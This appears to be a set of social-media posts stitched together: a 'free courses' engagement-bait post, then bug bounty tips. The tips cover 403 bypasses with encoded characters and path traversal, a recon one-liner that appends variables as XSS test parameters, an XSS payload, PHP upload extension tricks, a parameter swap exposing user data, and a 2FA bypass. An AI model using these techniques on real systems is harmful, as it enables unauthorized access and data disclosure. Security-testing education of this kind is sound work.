Are you struggling to pay a huge amount on paid courses ??
I'm giving you access to 20+ FREE Courses
1. Artificial Intelligence
2. Machine Learning
3. Cloud Computing
4. Ethical Hacking
5. Data Analytics
6. AWS Certified
7. Data Science
8. BIG DATA
9. Python
10. MBA............................Etc
To get it, just:
1. Like & Retweet
2. Comment "Free"
3. MUST be Following (so that I can dm)
[+] 403 bypass methodology !
1- using space symbols
exmaple:
/admin -> 403
/admin%09 -> 200
/admin%20 -> 200
2- use traversal
Example:
/admin -> 403
/..;/admin -> 200
you can fuzz with traversal sometimes that's end with results
Example: /..;/FUZZ
#bugbountytips
📚 Find hidden GET parameters in javascript files
Credit - By @chiraggupta8769 (@intigriti, @sratarun)
Here’s an interesting tip for finding hidden parameters by analyzing javascript files:
➡️ Scour javascript files for variable names, e.g.: var test = "xxx"
➡️ Try each of them as a GET parameter to uncover hidden parameters, e.g.: https://t.co/9WDqSZy2mP”xsstest
This often results in XSS!
Turns out @sratarun made this intricate one-liner generator which finds all variable names and appends them as parameters:
assetfinder https://t.co/FbmOBTsKqP | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

Now we can test all these URLs and check whether we can trigger XSS with them or similar things.
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
Another day another bug 🔥
This time we got XSS with the following payload to bypass target's restrictions:
/><output name="result" onclick="alert('something')">chux</output>
#BugBounty#bugbountytips#Hacking
When you find a file upload, try changing some of the file extension characters to uppercase!
❌ .php ---> .pHP ✅
❌ .php ---> .PHP ✅
❌ .php ---> .PhP ✅
Biidznillah, I was awarded a $2,500 bounty on @Hacker0x01
1. Type "amr" in the search feature
2. GET /user/api/search?keywords=amr&q=keywords
3. Change to
4. GET /user/api/[email protected]&q=email
Sensitive information about the victim was disclosed
#bugbountytips
2fa bypass :
Open two different browsers and go to log in.
Get to the 2FA screen in one browser, entering the user’s password.
In the other browser, log in fully and change the user’s password.
In the first browser, correctly finish 2FA authentication